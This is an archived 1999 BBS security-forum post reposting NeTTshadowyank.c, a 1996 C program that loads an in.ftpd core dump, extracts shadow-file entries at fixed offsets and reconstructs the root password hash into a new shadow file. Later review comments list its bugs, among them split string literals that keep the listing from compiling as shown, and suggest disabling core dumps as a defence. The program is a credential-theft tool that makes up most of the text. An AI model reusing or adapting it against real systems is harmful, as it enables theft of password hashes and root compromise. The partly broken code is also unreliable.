📄 core dump by ftp.txt
发信人: biff (大可), 信区: Security
标 题: core dump by ftp
发信站: 武汉白云黄鹤站 (Sun Jun 13 14:58:25 1999), 站内信件
/* NeTTshadowyank.c, by NeTTwerk (nettwerk@spyder.org)
Oct 17, 1996
Released into the Public Domain (not for use with some sets)
**NeTTshadowyank**
Version 1.0
nettwerk@spyder.org
NeTTshadowyank is a simple utility which reads a corefile created by
in.ftpd, and pulls out the shadow file 8).. it also reconstructs the root
password (which is corrupted in the shadow entry buffer), and puts it
in the appropriate place in the targetfile 'NeTTshadowyank.shadow'.
This is a really brainless program from the perspective that it has
very *little* intelligence... Version 2.0 will have my infamous
'heuristics engine' which will *look* for shadow entries/passwd entries
in the binary file.
(btw: if you don't know *how* to make in.ftpd dump core with the shadow
file inside it, tough luck)
Greets for this little util go out for BioH,mudge,glyph (all the l0pht guys),
bika,k,rommel,hobbit and of course,whoever wrote in.ftpd ;)
latah.
questions can be sent to nettwerk@spyder.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <malloc.h>
#include <unistd.h>
#include <sys/elftypes.h>
#include <elf.h>
#include <fcntl.h>
#include <sys/stat.h>
/*
 * Byte offsets into the in-memory copy of the core file.
 *
 * ROOT_OFFSET   - where main() reads the NUL-terminated string that it
 *                 writes as the password field of the rebuilt root entry.
 * SHADOW_OFFSET - where main() starts its byte-by-byte copy into the
 *                 scratch file.
 *
 * NOTE(review): both are fixed constants, so they presumably match the core
 * layout of one particular in.ftpd build - confirm. Nothing in this file
 * compares them with the size of the core that was actually loaded.
 */
#define ROOT_OFFSET 0xd7d4
#define SHADOW_OFFSET 0xfadb
/*
 * Entry point. Loads the file named by argv[1] completely into memory,
 * prints the ELF identification fields found at its start, and then writes
 * two files in the current directory:
 *
 *   NeTTshadowyank.scratch - the bytes starting at SHADOW_OFFSET, copied
 *                            until the text "lic_key" or a '#' is seen,
 *                            with each NUL byte written as a space.
 *   NeTTshadowyank.shadow  - the scratch file line by line, except that a
 *                            line beginning with "root" is replaced by an
 *                            entry built from the string at ROOT_OFFSET.
 *
 * Review notes on the code as listed:
 *   - Neither offset is checked against the file size and the copy loop has
 *     no end-of-buffer bound, so a file that is smaller than expected, or
 *     that lacks both terminators, is read outside the allocation.
 *   - The ELF header is only printed; processing continues even when the
 *     file is not a core dump.
 *   - memset(), strncmp() and strlen() are used but <string.h> is not in
 *     the include list, and "void main" with K&R-style parameters is not a
 *     standard definition of main.
 *   - Every error path exits with status 0.
 *
 * Defensive context: the program's only input is a core file from a daemon
 * whose memory still held shadow-file text, as the file header describes.
 * Keeping such processes from writing core files (for example a zero
 * RLIMIT_CORE) or restricting who can read them removes that input.
 */
void main(argc,argv)
int argc;
char **argv;
{
FILE *fp;
FILE *fp2;
char SZ_line[255];
Elf32_Ehdr *Telf32_hdr;
int I_fd;
void *Vp_buff;
struct stat Sstat_buf;
char *Cp_ptr;
/* Exactly one argument is expected: the path of the core file. */
/* NOTE(review): this and every later error path call exit(0), so a failure
   reports the same exit status as success. */
if (argc!=2)
{
printf("[NeTTshadowyank] Usage: %s corefilename\n",argv[0]);
exit(0);
}
if ((I_fd=open(argv[1],O_RDONLY))<0)
{
perror("Opening Corefile");
exit(0);
}
/* fstat() supplies the file size used for the allocation and the read. */
if (fstat(I_fd,&Sstat_buf)<0)
{
perror("fstat()'ing file");
exit(0);
}
/* NOTE(review): the string literal in the next statement is split across two
   lines in this listing (it looks like line-wrap from the posting - confirm
   against another copy) and will not compile as shown. "%d" is also paired
   with st_size, which is an off_t rather than an int. */
printf("[NeTTshadowyank] Loading %s, size %d
bytes\n",argv[1],Sstat_buf.st_size);
/* The whole file is held in one heap buffer. */
if (!(Vp_buff=malloc(Sstat_buf.st_size)))
{
printf("Out of Memory\n");
exit(0);
}
/* Zero-fill first, so bytes that read() does not fill stay zero. */
memset(Vp_buff,0,Sstat_buf.st_size);
/* NOTE(review): only a negative return counts as failure; a short read is
   neither detected nor retried. */
if (read(I_fd,(char *)Vp_buff,Sstat_buf.st_size)<0)
{
perror("Reading corefile");
exit(0);
}
/* View the start of the buffer as a 32-bit ELF header.
   NOTE(review): nothing checks that the file is at least
   sizeof(Elf32_Ehdr) bytes long. */
Telf32_hdr = (Elf32_Ehdr *)Vp_buff;
/* Print the four magic bytes. NOTE(review): the EI_MAG1, EI_MAG2 and EI_MAG3
   identifiers are split across lines in this listing. */
printf("File Type ->%c%c%c%c\n",Telf32_hdr->e_ident[EI_MAG0]
,Telf32_hdr->e_ident[EI
_MAG1]
,Telf32_hdr->e_ident[EI
_MAG2]
,Telf32_hdr->e_ident[EI
_MAG3]);
/* EI_CLASS: 1 and 2 are the ELFCLASS32 and ELFCLASS64 values. */
printf("File Class->0x%x",Telf32_hdr->e_ident[EI_CLASS]);
if (Telf32_hdr->e_ident[EI_CLASS]==1)
printf(" (32 Bit Binary)\n");
else if (Telf32_hdr->e_ident[EI_CLASS]==2)
printf(" (64 Bit Binary)\n");
else
printf(" (BAD Binary)\n");
/* EI_DATA: 1 and 2 are ELFDATA2LSB and ELFDATA2MSB, which describe byte
   order (little or big endian) even though the labels say "Bit". */
printf("File Data ->0x%x",Telf32_hdr->e_ident[EI_DATA]);
if (Telf32_hdr->e_ident[EI_DATA]==1)
printf(" (Least Significant Bit)\n");
else if (Telf32_hdr->e_ident[EI_DATA]==2)
printf(" (Most Significant Bit)\n");
else
printf(" (BAD Binary)\n");
printf("File Vers ->0x%x\n",Telf32_hdr->e_ident[EI_VERSION]);
/* e_type: 1 to 4 are ET_REL, ET_EXEC, ET_DYN and ET_CORE.
   NOTE(review): 5 does not look like a standard ELF file type; the
   "Numeric Executable" label may come from a header's ET_NUM count
   constant - verify. The value is only reported: nothing below depends on
   the file actually being a core dump. */
printf("File Type ->0x%x",Telf32_hdr->e_type);
if (Telf32_hdr->e_type==1)
printf(" (Relocatable Executable)\n");
else if (Telf32_hdr->e_type==2)
printf(" (EXEC Executable)\n");
else if (Telf32_hdr->e_type==3)
printf(" (Dynamic Executable)\n");
else if (Telf32_hdr->e_type==4)
printf(" (Core Dump [Post-Mortem])\n");
else if (Telf32_hdr->e_type==5)
printf(" (Numeric Executable)\n");
else
printf(" (Unknown Binary Format)\n");
/* Point at the fixed ROOT_OFFSET inside the buffer.
   NOTE(review): arithmetic on a void * is a compiler extension, and
   ROOT_OFFSET is not checked against st_size. */
Cp_ptr=Vp_buff+ROOT_OFFSET;
/* NOTE(review): the first "%s" receives the integer ROOT_OFFSET, which is
   undefined behavior; a numeric conversion such as "0x%x" matches that
   argument. */
printf("Root Password location (%s) ->%s\n",ROOT_OFFSET,Cp_ptr);
printf("Reconstructing shadow file\n");
/* Pass 1: dump the raw region into a scratch file. */
if (!(fp=fopen("NeTTshadowyank.scratch","w")))
{
perror("Creating scratch file");
exit(0);
}
Cp_ptr=Vp_buff+SHADOW_OFFSET;
/* Copy one byte at a time until the text "lic_key" or a '#' is reached,
   writing a space in place of each NUL byte.
   NOTE(review): there is no end-of-buffer bound; if neither terminator
   occurs, the loop keeps reading past the allocation. SHADOW_OFFSET is not
   checked against st_size either. */
while(1)
{
if (!strncmp(Cp_ptr,"lic_key",7))
break;
if (*Cp_ptr=='#')
break;
if (*Cp_ptr==0)
fprintf(fp," ");
else
fprintf(fp,"%c",*Cp_ptr);
Cp_ptr++;
}
fclose(fp);
/* Pass 2: re-read the scratch file line by line and write the target file. */
if (!(fp=fopen("NeTTshadowyank.scratch","r")))
{
perror("Opening Scratch File");
exit(0);
}
if (!(fp2=fopen("NeTTshadowyank.shadow","w")))
{
perror("Creating target file");
exit(0);
}
while(fgets(SZ_line,sizeof(SZ_line),fp))
{
/* Drop the last character, normally the '\n' that fgets() keeps.
   NOTE(review): a chunk cut off by the 255-byte buffer, or a final line
   with no newline, loses a real character here. */
SZ_line[(strlen(SZ_line)-1)]=0;
/* A line beginning with "root" is replaced by an entry rebuilt from the
   string at ROOT_OFFSET (the file header says the root field is corrupted
   in the entry buffer). NOTE(review): the 4-byte prefix test also matches
   any other name that starts with "root". */
if (!strncmp(SZ_line,"root",4))
{
Cp_ptr=Vp_buff+ROOT_OFFSET;
/* NOTE(review): the string literal in the next statement is also split
   across two lines in this listing. */
printf("[NeTTshadowyank] Repairing Root Shadow
Entry\n");
fprintf(fp2,"root:%s:0::::::\n",Cp_ptr);
}
else
fprintf(fp2,"%s\n",SZ_line);
}
/* NOTE(review): fp, fp2 and I_fd are not closed and Vp_buff is not freed
   before main returns, so a write error on the target file goes
   unreported. */
}
--